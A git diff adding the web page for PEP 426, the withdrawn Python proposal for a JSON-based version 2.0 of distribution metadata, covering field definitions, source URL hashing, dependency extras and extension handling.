+ + + + + \ No newline at end of file diff --git a/pep-0426/index.html b/pep-0426/index.html new file mode 100644 index 00000000000..e5b3f0c5bc3 --- /dev/null +++ b/pep-0426/index.html @@ -0,0 +1,1522 @@ + + + + + + + + PEP 426 – Metadata for Python Software Packages 2.0 | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 426 – Metadata for Python Software Packages 2.0

+
+
Author:
+
Alyssa Coghlan <ncoghlan at gmail.com>, +Daniel Holth <dholth at gmail.com>, +Donald Stufft <donald at stufft.io>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Withdrawn
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Requires:
+
440, 508, 518
+
Created:
+
30-Aug-2012
+
Post-History:
+
14-Nov-2012, 05-Feb-2013, 07-Feb-2013, 09-Feb-2013, +27-May-2013, 20-Jun-2013, 23-Jun-2013, 14-Jul-2013, +21-Dec-2013
+
Replaces:
+
345
+
Superseded-By:
+
566
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document. The up-to-date, canonical spec, Core metadata specifications, is maintained on the PyPA specs page.

+

×

+

See the PyPA specification update process for how to propose changes.

+
+
+

Important

+

This PEP has been withdrawn.

+

×

+

The ground-up metadata redesign proposed in this PEP has been withdrawn in +favour of the more modest proposal in PEP 566, which retains the basic +Key:Value format of previous metadata versions, but also defines a standardised +mechanism for translating that format to nested JSON-compatible data structures.

+

Some of the ideas in this PEP (or the related PEP 459) may still be considered +as part of later proposals, but they will be handled in a more incremental +fashion, rather than as a single large proposed change with no feasible +migration plan.

+

+
+
+

Abstract

+

This PEP describes a mechanism for publishing and exchanging metadata +related to Python distributions. It includes specifics of the field names, +and their semantics and usage.

+

This document specifies the never released version 2.0 of the metadata format.

+

Version 1.0 is specified in PEP 241. +Version 1.1 is specified in PEP 314. +Version 1.2 is specified in PEP 345.

+

Version 2.0 of the metadata format proposed migrating from directly defining a +custom key-value file format to instead defining a JSON-compatible in-memory +representation that may be used to define metadata representation in other +contexts (such as API and archive format definitions).

+

This version also defines a formal extension mechanism, allowing new +fields to be added for particular purposes without requiring updates to +the core metadata format.

+
+
+

Note on PEP History

+

This PEP was initially deferred for an extended period, from December 2013 +through to March 2017, as distutils-sig worked through a number of other +changes. These changes included:

+
    +
  • defining a binary compatibility tagging format in PEP 425
  • +
  • defining a binary archive format (wheel) in PEP 427
  • +
  • explicitly defining versioning and version comparison in PEP 440
  • +
  • explicitly defining the PyPI “simple” API in PEP 503
  • +
  • explicitly defining dependency specifiers and the extras system in PEP 508
  • +
  • declaring static build system dependencies (pyproject.toml) in PEP 518
  • +
  • migrating PyPI hosting to Rackspace, and placing it behind the Fastly CDN
  • +
  • shipping pip with CPython by default in PEP 453, and backporting that +addition to Python 2.7 in PEP 477
  • +
  • establishing packaging.python.org as the common access point for Python +packaging ecosystem documentation
  • +
  • migrating to using the specifications section of packaging.python.org +as the central location for tracking packaging related PEPs
  • +
+

The time spent pursuing these changes provided additional perspective on which +metadata format changes were genuinely desirable, and which could be omitted +from the revised specification as merely being “change for change’s sake”.

+

It also allowed a number of features that aren’t critical to the core activity +of publishing and distributing software to be moved out to PEP 459, a separate +proposal for a number of standard metadata extensions that provide additional +optional information about a release.

+

As of September 2017, it was deferred again, on the grounds that +it doesn’t actually help solve any particularly pressing problems:

+
    +
  • JSON representation would be better handled through defining a +transformation of the existing metadata 1.2 fields
  • +
  • clarification of the additional fields defined in the past few +years and related changes to the spec management process would +be better covered in a minor spec version update
  • +
+

Finally, the PEP was withdrawn in February 2018 in favour of PEP 566 (which +pursues that more incremental strategy).

+
+
+

Purpose

+

The purpose of this PEP is to define a common metadata interchange format +for communication between software publication tools and software integration +tools in the Python ecosystem. One key aim is to support full dependency +analysis in that ecosystem without requiring the execution of arbitrary +Python code by those doing the analysis. Another aim is to encourage good +software distribution practices by default, while continuing to support the +current practices of almost all existing users of the Python Package Index +(both publishers and integrators). Finally, the aim is to support an upgrade +path from the currently in use metadata formats that is transparent to end +users.

+

The design draws on the Python community’s nearly 20 years of experience with +distutils based software distribution, and incorporates ideas and concepts +from other distribution systems, including Python’s setuptools, pip and +other projects, Ruby’s gems, Perl’s CPAN, Node.js’s npm, PHP’s composer +and Linux packaging systems such as RPM and APT.

+

While the specifics of this format are aimed at the Python ecosystem, some +of the ideas may also be useful in the future evolution of other dependency +management ecosystems.

+
+
+

Development, Distribution and Deployment of Python Software

+

The metadata design in this PEP is based on a particular conceptual model +of the software development and distribution process. This model consists of +the following phases:

+
    +
  • Software development: this phase involves working with a source checkout +for a particular application to add features and fix bugs. It is +expected that developers in this phase will need to be able to build the +software, run the software’s automated test suite, run project specific +utility scripts and publish the software.
  • +
  • Software publication: this phase involves taking the developed software +and making it available for use by software integrators. This includes +creating the descriptive metadata defined in this PEP, as well as making +the software available (typically by uploading it to an index server).
  • +
  • Software integration: this phase involves taking published software +components and combining them into a coherent, integrated system. This +may be done directly using Python specific cross-platform tools, or it may +be handled through conversion to development language neutral platform +specific packaging systems.
  • +
  • Software deployment: this phase involves taking integrated software +components and deploying them on to the target system where the software +will actually execute.
  • +
+

The publication and integration phases are collectively referred to as +the distribution phase, and the individual software components distributed +in that phase are formally referred to as “distribution packages”, but are more +colloquially known as just “packages” (relying on context to disambiguate them +from the “module with submodules” kind of Python package).

+

The exact details of these phases will vary greatly for particular use cases. +Deploying a web application to a public Platform-as-a-Service provider, +publishing a new release of a web framework or scientific library, +creating an integrated Linux distribution, or upgrading a custom application +running in a secure enclave are all situations this metadata design should +be able to handle.

+

The complexity of the metadata described in this PEP thus arises directly +from the actual complexities associated with software development, +distribution and deployment in a wide range of scenarios.

+
+

Supporting definitions

+

The key words “MUST”, “MUST NOT”, “REQUIRED”, “SHALL”, “SHALL NOT”, +“SHOULD”, “SHOULD NOT”, “RECOMMENDED”, “MAY”, and “OPTIONAL” in this +document are to be interpreted as described in RFC 2119.

+

“Projects” are software components that are made available for integration. +Projects include Python libraries, frameworks, scripts, plugins, +applications, collections of data or other resources, and various +combinations thereof. Public Python projects are typically registered on +the Python Package Index.

+

“Releases” are uniquely identified snapshots of a project.

+

“Distribution packages” are the packaged files which are used to publish +and distribute a release.

+

Depending on context, “package” may refer to either a distribution, or +to an importable Python module that has a __path__ attribute and hence +may also have importable submodules.

+

“Source archive” and “VCS checkout” both refer to the raw source code for +a release, prior to creation of an sdist or binary archive.

+

An “sdist” is a publication format providing the distribution metadata and +any source files that are essential to creating a binary archive for +the distribution. Creating a binary archive from an sdist requires that +the appropriate build tools be available on the system.

+

“Binary archives” only require that prebuilt files be moved to the correct +location on the target system. As Python is a dynamically bound +cross-platform language, many so-called “binary” archives will contain only +pure Python source code.

+

“Contributors” are individuals and organizations that work together to +develop a software component.

+

“Publishers” are individuals and organizations that make software components +available for integration (typically by uploading distributions to an +index server)

+

“Integrators” are individuals and organizations that incorporate published +distributions as components of an application or larger system.

+

“Build tools” are automated tools intended to run on development systems, +producing source and binary distribution archives. Build tools may also be +invoked by integration tools in order to build software distributed as +sdists rather than prebuilt binary archives.

+

“Index servers” are active distribution registries which publish version and +dependency metadata and place constraints on the permitted metadata.

+

“Public index servers” are index servers which allow distribution uploads +from untrusted third parties. The Python Package Index is a public index +server.

+

“Publication tools” are automated tools intended to run on development +systems and upload source and binary distribution archives to index servers.

+

“Integration tools” are automated tools that consume the metadata and +distribution archives published by an index server or other designated +source, and make use of them in some fashion, such as installing them or +converting them to a platform specific packaging format.

+

“Installation tools” are integration tools specifically intended to run on +deployment targets, consuming source and binary distribution archives from +an index server or other designated location and deploying them to the target +system.

+

“Automated tools” is a collective term covering build tools, index servers, +publication tools, integration tools and any other software that produces +or consumes distribution version and dependency metadata.

+

“Legacy metadata” refers to earlier versions of this metadata specification, +along with the supporting metadata file formats defined by the +setuptools project.

+

“Distro” is used as the preferred term for Linux distributions, to help +avoid confusion with the Python-specific use of the term “distribution +package”.

+

“Qualified name” is a dotted Python identifier. For imported modules and +packages, the qualified name is available as the __name__ attribute, +while for functions and classes it is available as the __qualname__ +attribute.

+

A “fully qualified name” uniquely locates an object in the Python module +namespace. For imported modules and packages, it is the same as the +qualified name. For other Python objects, the fully qualified name consists +of the qualified name of the containing module or package, a colon (:) +and the qualified name of the object relative to the containing module or +package.

+

A “prefixed name” starts with a qualified name, but is not necessarily a +qualified name - it may contain additional dot separated segments which are +not valid identifiers.

+
+
+

Integration and deployment of distributions

+

The primary purpose of the distribution metadata is to support integration +and deployment of distributions as part of larger applications and systems.

+

Integration and deployment can in turn be broken down into further substeps.

+
    +
  • Build: the build step is the process of turning a VCS checkout, source +archive or sdist into a binary archive. Dependencies must be available +in order to build and create a binary archive of the distribution +(including any documentation that is installed on target systems).
  • +
  • Installation: the installation step involves getting the distribution +and all of its runtime dependencies onto the target system. In this +step, the distribution may already be on the system (when upgrading or +reinstalling) or else it may be a completely new installation.
  • +
  • Runtime: this is normal usage of a distribution after it has been +installed on the target system.
  • +
+

These three steps may all occur directly on the target system. Alternatively +the build step may be separated out by using binary archives provided by the +publisher of the distribution, or by creating the binary archives on a +separate system prior to deployment. The advantage of the latter approach +is that it minimizes the dependencies that need to be installed on +deployment targets (as the build dependencies will be needed only on the +build systems).

+

The published metadata for distribution packages SHOULD allow integrators, with +the aid of build and integration tools, to:

+
    +
  • obtain the original source code that was used to create a distribution
  • +
  • identify and retrieve the dependencies (if any) required to use a +distribution
  • +
  • identify and retrieve the dependencies (if any) required to build a +distribution from source
  • +
  • identify and retrieve the dependencies (if any) required to run a +distribution’s test suite
  • +
+
+
+

Development and publication of distributions

+

The secondary purpose of the distribution metadata is to support effective +collaboration amongst software contributors and publishers during the +development phase.

+

The published metadata for distributions SHOULD allow contributors +and publishers, with the aid of build and publication tools, to:

+
    +
  • perform all the same activities needed to effectively integrate and +deploy the distribution
  • +
  • identify and retrieve the additional dependencies needed to develop and +publish the distribution
  • +
  • specify the dependencies (if any) required to use the distribution
  • +
  • specify the dependencies (if any) required to build the distribution +from source
  • +
  • specify the dependencies (if any) required to run the distribution’s +test suite
  • +
  • specify the additional dependencies (if any) required to develop and +publish the distribution
  • +
+
+
+
+

Metadata format

+

The format defined in this PEP is an in-memory representation of Python +distribution metadata as a string-keyed dictionary. Permitted values for +individual entries are strings, lists of strings, and additional +nested string-keyed dictionaries.

+

Except where otherwise noted, dictionary keys in distribution metadata MUST +be valid Python identifiers in order to support attribute based metadata +access APIs.

+

The individual field descriptions show examples of the key name and value +as they would be serialised as part of a JSON mapping.

+

Unless otherwise indicated, the fields identified as core metadata are required. +Automated tools MUST NOT accept distributions with missing core metadata as +valid Python distributions.

+

All other fields are optional. Automated tools MUST operate correctly +if a distribution does not provide them, except for those operations +which specifically require the omitted fields.

+

Automated tools MUST NOT insert dummy data for missing fields. If a valid +value is not provided for a required field then the metadata and the +associated distribution MUST be rejected as invalid. If a valid value +is not provided for an optional field, that field MUST be omitted entirely. +Automated tools MAY automatically derive valid values from other +information sources (such as a version control system).

+

Automated tools, especially public index servers, MAY impose additional +length restrictions on metadata beyond those enumerated in this PEP. Such +limits SHOULD be imposed where necessary to protect the integrity of a +service, based on the available resources and the service provider’s +judgment of reasonable metadata capacity requirements.

+
+

Metadata files

+

The information defined in this PEP is serialised to pysdist.json +files for some use cases. These are files containing UTF-8 encoded JSON +metadata.

+

Each metadata file consists of a single serialised mapping, with fields as +described in this PEP. When serialising metadata, automated tools SHOULD +lexically sort any keys and list elements in order to simplify reviews +of any changes.

+

There are expected to be three standard locations for these metadata files:

+
    +
  • as a {distribution}-{version}.dist-info/pysdist.json file in an +sdist source distribution archive
  • +
  • as a {distribution}-{version}.dist-info/pysdist.json file in a wheel +binary distribution archive
  • +
  • as a {distribution}-{version}.dist-info/pysdist.json file in a local +Python installation database
  • +
+

This file is expected to be identical in all three locations - it is +generated when creating a source archive or binary archive from a source +tree, and then preserved unchanged on installation, or when building a +binary archive from a source archive.

+
+

Note

+

These locations are to be confirmed, since they depend on the definition +of sdist 2.0 and the revised installation database standard. There will +also be a wheel 1.1 format update after this PEP is approved that +mandates provision of 2.0+ metadata.

+
+

Note that these metadata files MAY be processed even if the version of the +containing location is too low to indicate that they are valid. Specifically, +unversioned sdist archives, unversioned installation database directories +and version 1.0 of the wheel specification may still provide +pysdist.json files.

+
+

Note

+

Until this specification is formally marked as Active, it is recommended +that tools following the draft format use an alternative filename like +metadata.json or pep426-20131213.json to avoid colliding with +the eventually standardised files.

+
+

Other tools involved in Python distribution MAY also use this format.

+

Note that these metadata files are generated by build tools based on other +input formats (such as setup.py and pyproject.toml) rather than being +used directly as a data input format. Generating the metadata as part of the +publication process also helps to deal with version specific fields (including +the source URL and the version field itself).

+

For backwards compatibility with older installation tools, metadata 2.0 +files MAY be distributed alongside legacy metadata.

+

Index servers MAY allow distributions to be uploaded and installation tools +MAY allow distributions to be installed with only legacy metadata.

+

Automated tools MAY attempt to automatically translate legacy metadata to +the format described in this PEP. Advice for doing so effectively is given +in Appendix A.

+
+
+

Metadata validation

+

A jsonschema description of +the distribution metadata is available.

+

This schema does NOT currently handle validation of some of the more complex +string fields (instead treating them as opaque strings).

+

Except where otherwise noted, all URL fields in the metadata MUST comply +with RFC 3986.

+
+

Note

+

The current version of the schema file covers the previous draft of the +PEP, and has not yet been updated for the split into the essential +dependency resolution metadata and multiple standard extensions, and nor +has it been updated for the various other differences between the current +draft and the earlier drafts.

+
+
+
+
+

Core metadata

+

This section specifies the core metadata fields that are required for every +Python distribution.

+

Publication tools MUST ensure at least these fields are present when +publishing a distribution.

+

Index servers MUST ensure at least these fields are present in the metadata +when distributions are uploaded.

+

Installation tools MUST refuse to install distributions with one or more +of these fields missing by default, but MAY allow users to force such an +installation to occur.

+
+

Metadata version

+

Version of the file format; "2.0" is the only legal value.

+

Automated tools consuming metadata SHOULD warn if metadata_version is +greater than the highest version they support, and MUST fail if +metadata_version has a greater major version than the highest +version they support (as described in PEP 440, the major version is the +value before the first dot).

+

For broader compatibility, build tools MAY choose to produce +distribution metadata using the lowest metadata version that includes +all of the needed fields.

+

Example:

+
"metadata_version": "2.0"
+
+
+
+
+

Generator

+

Name (and optional version) of the program that generated the file, +if any. A manually produced file would omit this field.

+

Examples:

+
"generator": "flit"
+"generator": "setuptools (34.3.1)"
+
+
+
+
+

Name

+

The name of the distribution, as defined in PEP 508.

+

As distribution names are used as part of URLs, filenames, command line +parameters and must also interoperate with other packaging systems, the +permitted characters are constrained to:

+
    +
  • ASCII letters ([a-zA-Z])
  • +
  • ASCII digits ([0-9])
  • +
  • underscores (_)
  • +
  • hyphens (-)
  • +
  • periods (.)
  • +
+

Distribution names MUST start and end with an ASCII letter or digit.

+

Automated tools MUST reject non-compliant names. A regular expression to +enforce these constraints (when run with re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$
+
+
+

All comparisons of distribution names MUST be case insensitive, and MUST +consider hyphens and underscores to be equivalent.

+

Index servers MAY consider “confusable” characters (as defined by the +Unicode Consortium in TR39: Unicode Security Mechanisms) to be +equivalent.

+

Index servers that permit arbitrary distribution name registrations from +untrusted sources SHOULD consider confusable characters to be equivalent +when registering new distributions (and hence reject them as duplicates).

+

Integration tools MUST NOT silently accept a confusable alternate +spelling as matching a requested distribution name.

+

At time of writing, the characters in the ASCII subset designated as +confusables by the Unicode Consortium are:

+
    +
  • 1 (DIGIT ONE), l (LATIN SMALL LETTER L), and I (LATIN CAPITAL +LETTER I)
  • +
  • 0 (DIGIT ZERO), and O (LATIN CAPITAL LETTER O)
  • +
+

Example:

+
"name": "ComfyChair"
+
+
+
+
+

Version

+

The distribution’s public or local version identifier, as defined in PEP 440. +Version identifiers are designed for consumption by automated tools and +support a variety of flexible version specification mechanisms (see PEP 440 +for details).

+

Version identifiers MUST comply with the format defined in PEP 440.

+

Version identifiers MUST be unique within each project.

+

Index servers MAY place restrictions on the use of local version identifiers +as described in PEP 440.

+

Example:

+
"version": "1.0a2"
+
+
+
+
+

Summary

+

A short summary of what the distribution does.

+

This field SHOULD contain fewer than 512 characters and MUST contain fewer +than 2048.

+

This field SHOULD NOT contain any line breaks.

+

A more complete description SHOULD be included as a separate file in the +sdist for the distribution. Refer to the python-details extension in +PEP 459 for more information.

+

Example:

+
"summary": "A module that is more fiendish than soft cushions."
+
+
+
+
+
+

Source code metadata

+

This section specifies fields that provide identifying details for the +source code used to produce this distribution.

+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, including failing cleanly when an +operation depending on one of these fields is requested.

+
+

Source labels

+

Source labels are text strings with minimal defined semantics. They are +intended to allow the original source code to be unambiguously identified, +even if an integrator has applied additional local modifications to a +particular distribution.

+

To ensure source labels can be readily incorporated as part of file names +and URLs, and to avoid formatting inconsistencies in hexadecimal hash +representations they MUST be limited to the following set of permitted +characters:

+
    +
  • Lowercase ASCII letters ([a-z])
  • +
  • ASCII digits ([0-9])
  • +
  • underscores (_)
  • +
  • hyphens (-)
  • +
  • periods (.)
  • +
  • plus signs (+)
  • +
+

Source labels MUST start and end with an ASCII letter or digit.

+

A regular expression to rnforce these constraints (when run with +re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._-+]*[A-Z0-9])$
+
+
+

A source label for a project MUST NOT match any defined version for that +project. This restriction ensures that there is no ambiguity between version +identifiers and source labels.

+

Examples:

+
"source_label": "1.0.0-alpha.1"
+
+"source_label": "1.3.7+build.11.e0f985a"
+
+"source_label": "v1.8.1.301.ga0df26f"
+
+"source_label": "2013.02.17.dev123"
+
+
+
+
+

Source URL

+

A string containing a full URL where the source for this specific version of +the distribution can be downloaded.

+

Source URLs MUST be unique within each project. This means that the URL +can’t be something like "https://github.com/pypa/pip/archive/main.zip", +but instead must be "https://github.com/pypa/pip/archive/1.3.1.zip".

+

The source URL MUST reference either a source archive or a tag or specific +commit in an online version control system that permits creation of a +suitable VCS checkout. It is intended primarily for integrators that +wish to recreate the distribution from the original source form.

+

All source URL references SHOULD specify a secure transport mechanism +(such as https) AND include an expected hash value in the URL for +verification purposes. If a source URL is specified without any hash +information, with hash information that the tool doesn’t understand, or +with a selected hash algorithm that the tool considers too weak to trust, +automated tools SHOULD at least emit a warning and MAY refuse to rely on +the URL. If such a source URL also uses an insecure transport, automated +tools SHOULD NOT rely on the URL.

+

For source archive references, an expected hash value may be specified by +including a <hash-algorithm>=<expected-hash> entry as part of the URL +fragment.

+

As of 2017, it is RECOMMENDED that 'sha256' hashes be used for source +URLs, as this hash is not yet known to be vulnerable to generation of +malicious collisions, while also being widely available on client systems.

+

For version control references, the VCS+protocol scheme SHOULD be +used to identify both the version control system and the secure transport, +and a version control system with hash based commit identifiers SHOULD be +used. Automated tools MAY omit warnings about missing hashes for version +control systems that do not provide hash based commit identifiers.

+

To handle version control systems that do not support including commit or +tag references directly in the URL, that information may be appended to the +end of the URL using the @<commit-hash> or the @<tag>#<commit-hash> +notation.

+
+

Note

+

This isn’t quite the same as the existing VCS reference notation +supported by pip. Firstly, the distribution name is a separate field rather +than embedded as part of the URL. Secondly, the commit hash is included +even when retrieving based on a tag, in order to meet the requirement +above that every link should include a hash to make things harder to +forge (creating a malicious repo with a particular tag is easy, creating +one with a specific hash, less so).

+
+

Example:

+
"source_url": "https://github.com/pypa/pip/archive/1.3.1.zip#sha256=2dc6b5a470a1bde68946f263f1af1515a2574a150a30d6ce02c6ff742fcc0db8
+"source_url": "git+https://github.com/pypa/pip.git@1.3.1#7921be1537eac1e97bc40179a57f0349c2aee67d"
+"source_url": "git+https://github.com/pypa/pip.git@7921be1537eac1e97bc40179a57f0349c2aee67d"
+
+
+
+
+
+

Semantic dependencies

+

Dependency metadata allows published projects to make use of functionality +provided by other published projects, without needing to bundle copies of +particular releases of those projects.

+

Semantic dependencies allow publishers to indicate not only which other +projects are needed, but also why they’re needed. This additional +information allows integrators to install just the dependencies they need +for specific activities, making it easier to minimise installation +footprints in constrained environments (regardless of the reasons for +those constraints).

+

By default, dependency declarations are assumed to be for +“runtime dependencies”: other releases that are needed to actually use the +published release.

+

There are also four different kinds of optional dependency that releases may +declare:

+
    +
  • test dependencies: other releases that are needed to run the +automated test suite for this release, but are not needed just to +use it (e.g. nose2 or pytest)
  • +
  • build dependencies: other releases that are needed to build this +a deployable binary version of this release from source +(e.g. flit or setuptools)
  • +
  • doc dependencies: other releases that are needed to build the +documentation for this distribution (e.g. the sphinx build tool)
  • +
  • dev dependencies: other releases that are needed when working on this +distribution, but do not fit into exactly one of the other optional +dependency categories (e.g. pylint, flake8). dev dependencies +are also effectively considered as combined test, build, and doc +dependencies, without needing to be listed three times
  • +
+

These optional categories are known as +Extras. In addition to the four +standard categories, projects may also declare their own custom categories +in the Extras field.

+

There are also two standard extra categories that imply dependencies on +other extras:

+
    +
  • alldev: implies the test, build, doc, dev extras
  • +
  • all: if not otherwise defined, implies all declared extras
  • +
+

Dependency management is heavily dependent on the version identification +and specification scheme defined in PEP 440 and the dependency specification, +extra, and environment marker schemes defined in PEP 508.

+

All of these fields are optional. Automated tools MUST operate correctly if +a distribution does not provide them, by assuming that a missing field +indicates “Not applicable for this distribution”.

+
+

Mapping dependencies to development and distribution activities

+

The different categories of dependency are based on the various distribution +and development activities identified above, and govern which dependencies +should be installed for the specified activities:

+
    +
  • Required runtime dependencies:
      +
    • unconditional dependencies
    • +
    +
  • +
  • Required build dependencies:
      +
    • the build extra
    • +
    • the dev extra
    • +
    • If running the distribution’s test suite as part of the build process, +also install the unconditional dependencies and test extra
    • +
    +
  • +
  • Required development and publication dependencies:
      +
    • unconditional dependencies
    • +
    • the test extra
    • +
    • the build extra
    • +
    • the doc extra
    • +
    • the dev extra
    • +
    +
  • +
+

The notation described in Extras (optional dependencies) SHOULD be used +to determine exactly what gets installed for various operations.

+

Installation tools SHOULD report an error if dependencies cannot be +satisfied, MUST at least emit a warning, and MAY allow the user to force +the installation to proceed regardless.

+

See Appendix B for an overview of mapping these dependencies to an RPM +spec file.

+
+
+

Extras

+

A list of optional sets of dependencies that may be used to define +conditional dependencies in dependency fields. See +Extras (optional dependencies) for details.

+

The names of extras MUST abide by the same restrictions as those for +distribution names.

+

The following extra names are available by default and MUST NOT be +declared explicitly in this field:

+
    +
  • all
  • +
  • alldev
  • +
  • build
  • +
  • dev
  • +
  • doc
  • +
  • test
  • +
+

Example:

+
"extras": ["warmup", "tea"]
+
+
+
+
+

Dependencies

+

A list of release requirements needed to actually run this release.

+

Public index servers MAY prohibit strict version matching clauses or direct +references in this field.

+

Example:

+
"dependencies":
+  {
+    "requires": ["SciPy", "PasteDeploy", "zope.interface > 3.5.0"]
+  },
+  {
+    "requires": ["pywin32 > 1.0"],
+    "environment": "sys_platform == 'win32'"
+  },
+  {
+    "requires": ["SoftCushions"],
+    "extra": "warmup"
+  }
+]
+
+
+

While many dependencies will be needed to use a project release at all, others +are needed only on particular platforms or only when particular optional +features of the release are needed.

+

To handle this, release dependency specifiers are mappings with the following +subfields:

+
    +
  • requires: a list of requirements needed to satisfy the dependency
  • +
  • extra: the name of a set of optional dependencies that are requested +and installed together. See Extras (optional dependencies) for details
  • +
  • environment: an environment marker defining the environment that +needs these dependencies. The syntax and capabilities of environment +markers are defined in PEP 508
  • +
+

Individual entries in the requires lists are strings using the dependency +declaration format defined in PEP 508, with the exception that environment +markers MUST NOT be included in the individual dependency declarations, and +are instead supplied in the separate environment field.

+

requires is the only required subfield. When it is the only subfield, the +dependencies are said to be unconditional. If extra or environment +is specified, then the dependencies are conditional.

+

All three fields may be supplied, indicating that the dependencies are +needed only when the named extra is requested in a particular environment.

+

Automated tools MUST combine related dependency specifiers (those with +common values for extra and environment) into a single specifier +listing multiple requirements when serialising metadata.

+

Despite this required normalisation, the same extra name or environment +marker MAY appear in multiple conditional dependencies. This may happen, +for example, if an extra itself only needs some of its dependencies in +specific environments. It is only the combination of extras and environment +markers that is required to be unique in a list of dependency specifiers.

+

Aside from the six standard extra categories, any extras referenced from a +dependency specifier MUST be named in the Extras field for this distribution. +This helps avoid typographical errors and also makes it straightforward to +identify the available extras without scanning the full set of dependencies.

+

To reuse an extra definition as part of another extra, project releases MAY +declare dependencies on themselves. To avoid infinite recursion in these cases, +automated tools MUST special case dependencies from a project back onto itself.

+
+
+
+

Metadata Extensions

+

Extensions to the metadata MAY be present in a mapping under the +extensions key. The keys MUST be valid prefixed names, while +the values MUST themselves be nested mappings.

+

Two key names are reserved and MUST NOT be used by extensions, except as +described below:

+
    +
  • extension_version
  • +
  • installer_must_handle
  • +
+

The following example shows the python.details and python.commands +standard extensions from PEP 459:

+
"extensions" : {
+  "python.details": {
+    "license": "GPL version 3, excluding DRM provisions",
+    "keywords": [
+      "comfy", "chair", "cushions", "too silly", "monty python"
+    ],
+    "classifiers": [
+      "Development Status :: 4 - Beta",
+      "Environment :: Console (Text Based)",
+      "License :: OSI Approved :: GNU General Public License v3 (GPLv3)"
+    ],
+    "document_names": {
+        "description": "README.rst",
+        "license": "LICENSE.rst",
+        "changelog": "NEWS"
+    }
+  },
+  "python.commands": {
+    "wrap_console": [{"chair": "chair:run_cli"}],
+    "wrap_gui": [{"chair-gui": "chair:run_gui"}],
+    "prebuilt": ["reduniforms"]
+  },
+}
+
+
+

Extension names are defined by distributions that will then make use of +the additional published metadata in some way.

+

To reduce the chance of name conflicts, extension names SHOULD use a +prefix that corresponds to a module name in the distribution that defines +the meaning of the extension. This practice will also make it easier to +find authoritative documentation for metadata extensions.

+

Metadata extensions allow development tools to record information in the +metadata that may be useful during later phases of distribution, but is +not essential for dependency resolution or building the software.

+
+

Extension versioning

+

Extensions MUST be versioned, using the extension_version key. +However, if this key is omitted, then the implied version is 1.0.

+

Automated tools consuming extension metadata SHOULD warn if +extension_version is greater than the highest version they support, +and MUST fail if extension_version has a greater major version than +the highest version they support (as described in PEP 440, the major +version is the value before the first dot).

+

For broader compatibility, build tools MAY choose to produce +extension metadata using the lowest metadata version that includes +all of the needed fields.

+
+
+

Required extension handling

+

A project may consider correct handling of some extensions to be essential +to correct installation of the software. This is indicated by setting the +installer_must_handle field to true. Setting it to false or +omitting it altogether indicates that processing the extension when +installing the distribution is not considered mandatory by the developers.

+

Installation tools MUST fail if installer_must_handle is set to true +for an extension and the tool does not have any ability to process that +particular extension (whether directly or through a tool-specific plugin +system).

+

If an installation tool encounters a required extension it doesn’t +understand when attempting to install from a wheel archive, it MAY fall +back on attempting to install from source rather than failing entirely.

+
+
+
+

Extras (optional dependencies)

+

As defined in PEP 508, extras are additional dependencies that enable an +optional aspect of a project release, often corresponding to a try: import +optional_dependency ... block in the code. They are also used to indicate +semantic dependencies for activities other than normal runtime using (such as +testing, building, or working on the component).

+

To support the use of the release with or without the optional dependencies, +they are listed separately from the release’s core runtime dependencies +and must be requested explicitly, either in the dependency specifications of +another project, or else when issuing a command to an installation tool.

+

Example of a distribution with optional dependencies:

+
"name": "ComfyChair",
+"extras": ["warmup"]
+"dependencies": [
+  {
+    "requires": ["SoftCushions"],
+    "extra": "warmup"
+  },
+  {
+    "requires": ["cython"],
+    "extra": "build"
+  }
+]
+
+
+

Other distributions require the additional dependencies by placing the +relevant extra names inside square brackets after the distribution name when +specifying the dependency. Multiple extras from a dependency can be requested +by placing to

+

If the standard all extra has no explicitly declared entries, then +integration tools SHOULD implicitly define it as a dependency on all of the +extras explicitly declared by the project.

+

If the standard alldev extra has no explicitly declared entries, then +integration tools SHOULD implicitly define it as a dependency on the standard +test, build, doc, and dev extras.

+

The full set of dependency requirements is then based on the unconditional +dependencies, along with those of any requested extras.

+

Dependency examples (showing just the requires subfield):

+
"requires": ["ComfyChair"]
+    -> requires ``ComfyChair`` only
+
+"requires": ["ComfyChair[warmup]"]
+    -> requires ``ComfyChair`` and ``SoftCushions``
+
+"requires": ["ComfyChair[all]"]
+    -> requires ``ComfyChair`` and ``SoftCushions``, but will also
+       pick up any new extras defined in later versions
+
+
+
+
+

Updating the metadata specification

+

The metadata specification may be updated with clarifications without +requiring a new PEP or a change to the metadata version.

+

Changing the meaning of existing fields or adding new features (other than +through the extension mechanism) requires a new metadata version defined in +a new PEP.

+
+
+

Appendix A: Conversion notes for legacy metadata

+

The reference implementations for converting from legacy metadata to +metadata 2.0 are:

+
    +
  • the wheel project, which +adds the bdist_wheel command to setuptools
  • +
  • the Warehouse project, which +will eventually be migrated to the Python Packaging Authority as the next +generation Python Package Index implementation
  • +
  • the distlib project which is +derived from the core packaging infrastructure created for the +distutils2 project
  • +
+
+

Note

+

These tools have yet to be updated for the switch to standard extensions +for several fields.

+
+

While it is expected that there may be some edge cases where manual +intervention is needed for clean conversion, the specification has been +designed to allow fully automated conversion of almost all projects on +PyPI.

+

Metadata conversion (especially on the part of the index server) is a +necessary step to allow installation and analysis tools to start +benefiting from the new metadata format, without having to wait for +developers to upgrade to newer build systems.

+
+
+

Appendix B: Mapping dependency declarations to an RPM SPEC file

+

As an example of mapping this PEP to Linux distro packages, assume an +example project without any extras defined is split into 2 RPMs +in a SPEC file: example and example-devel.

+

The unconditional dependencies would be mapped to the Requires dependencies +for the “example” RPM (a mapping from environment markers relevant to Linux +to SPEC file conditions would also allow those to be handled correctly).

+

The build and dev extra dependencies would be mapped to the +BuildRequires dependencies for the “example” RPM. Depending on how the +%check section in the RPM was defined, the test extra may also be +mapped to the BuildRequires declaration for the RPM.

+

All defined dependencies relevant to Linux in the dev, test, build, +and doc extras would become Requires dependencies for the “example-devel” +RPM.

+

